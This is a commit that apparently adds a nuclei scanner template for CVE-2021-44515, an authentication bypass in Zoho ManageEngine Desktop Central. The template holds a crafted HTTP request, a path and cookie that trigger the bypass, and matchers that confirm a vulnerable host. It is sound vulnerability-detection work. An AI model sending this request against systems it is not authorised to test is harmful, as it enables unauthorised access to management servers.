Zoho Desktop Central Authentication Bypass Vulnerability (CVE-2021-44515) (#4142)

* Added Template for CVE-2021-44515

* Update bigip-config-utility-detect.yaml

* Update bigip-config-utility-detect.yaml

* Update bigip-config-utility-detect.yaml

* misc updates

Co-authored-by: sandeep <sandeep@projectdiscovery.io>

cves/2021/CVE-2021-44515.yaml

@@ -0,0 +1,36 @@
+id: CVE-2021-44515
+
+info:
+  name: Zoho ManageEngine Desktop Central - Remote Code Execution
+  author: Adam Crosser
+  severity: critical
+  description: Zoho Desktop Central contains an authentication bypass vulnerability that could allow an attacker to execute arbitrary code in the Desktop Central MSP server.
+  reference:
+    - https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-13-known-exploited-vulnerabilities-catalog
+    - https://srcincite.io/blog/2022/01/20/zohowned-a-critical-authentication-bypass-on-zoho-manageengine-desktop-central.html
+    - https://attackerkb.com/topics/rJw4DFI2RQ/cve-2021-44515/rapid7-analysis
+  classification:
+    cve-id: CVE-2021-44515
+  tags: cve,cve2021,cisa,zoho,rce,manageengine
+
+requests:
+  - raw:
+      - |
+        GET /STATE_ID/123/agentLogUploader HTTP/1.1
+        Host: {{Hostname}}
+        Cookie: STATE_COOKIE=&_REQS/_TIME/123
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: dsl
+        dsl:
+          - "len(body) == 0"
+
+      - type: word
+        part: header
+        words:
+          - "UEMJSESSIONID="